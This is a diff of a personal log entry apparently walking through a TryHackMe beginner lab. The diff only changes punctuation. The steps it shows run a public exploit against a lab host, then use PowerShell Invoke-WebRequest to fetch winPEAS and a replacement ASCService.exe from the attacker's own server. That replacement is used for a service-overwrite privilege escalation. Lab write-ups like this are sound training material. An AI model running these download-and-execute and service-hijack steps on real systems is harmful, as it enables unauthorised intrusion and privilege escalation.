cardboard-iguana/cardboard-iguana.com/log/2021-11-08-tryhackme-complete-beginner.md

 python2 39161.py 10.10.174.199 8080
 ```

-Once we’re in (the exploit needs to be run twice to work), we need to grab and run winPEASx64.exe from our web server.
+Once we're in (the exploit needs to be run twice to work), we need to grab and run winPEASx64.exe from our web server.

 ```powershell
 powershell -c "Invoke-WebRequest -Uri http://10.13.26.40/winPEASx64.exe -OutFile winPEASx64.exe" .\winPEASx64.exe
 ```

 Interestingly, while WinPEAS notes that ASCServie.exe is vulnerable to an overwrite, it looks like it misses the fact that the compromised user can restart it.
-That said, WinPEAS does display *a lot* more information than PowerUp, so it might be useful to run *both*…
+That said, WinPEAS does display *a lot* more information than PowerUp, so it might be useful to run *both*...

 Useful PowerShell commands:

-* `Get-Service` — list all services, or drill down on a particular service.
+* `Get-Service` - list all services, or drill down on a particular service.
-* `sc stop $SERVICE`/`sc start $SERVICE` — stop/start $SERVICE.
+* `sc stop $SERVICE`/`sc start $SERVICE` - stop/start $SERVICE.

-Putting this all together, we can replicate yesterday’s compromise by:
+Putting this all together, we can replicate yesterday's compromise by:

 ```powershell
 powershell -c "Invoke-WebRequest -Uri http://10.13.26.40/ASCService.exe -OutFile ASCService.exe"